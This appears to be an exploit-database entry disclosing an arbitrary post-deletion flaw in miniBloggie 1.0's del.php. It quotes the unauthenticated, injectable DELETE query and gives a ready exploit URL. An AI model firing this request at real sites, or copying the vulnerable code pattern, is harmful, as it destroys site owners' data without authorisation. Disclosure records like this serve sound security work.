Lucene search
Cod3rZEDB-ID:5568HistoryMay 08, 2008 - 12:00 a.m.
miniBloggie 1.0 - 'del.php' Arbitrary Delete Post
2008-05-0800:00:00
Cod3rZ
www.exploit-db.com
29
AI Score
7.4
Confidence
Low
# MiniBloggie Arbitrary Delete Post Vulnerability
# Author: Cod3rZ
# Site: http://cod3rz.helloweb.eu
# PoC:
# if (isset($_GET['post_id'])) $post_id = $_GET['post_id'];
# if (isset($_GET['confirm'])) $confirm = $_GET['confirm'];
# [...]
# elseif ($confirm=="yes") {
# [...]
# $sql = "DELETE FROM blogdata WHERE post_id=$post_id";
# $query = mysql_query($sql) or die("Cannot query the database.<br>" . mysql_error());
# Vuln: http://site/del.php?post_id=[postid]&confirm=yes
# Ex: http://127.0.0.1/del.php?post_id=1&confirm=yes
# Visit http://devilsnight.altervista.org
# milw0rm.com [2008-05-08]Related
nvd
nvd
CVE-2008-6650
2009-04-07 14:17:17
cve
cve
CVE-2008-6650
2009-04-07 14:17:17
prion
prion
Design/Logic Flaw
2009-04-07 14:17:00
cvelist
cvelist
CVE-2008-6650
2009-04-07 10:00:00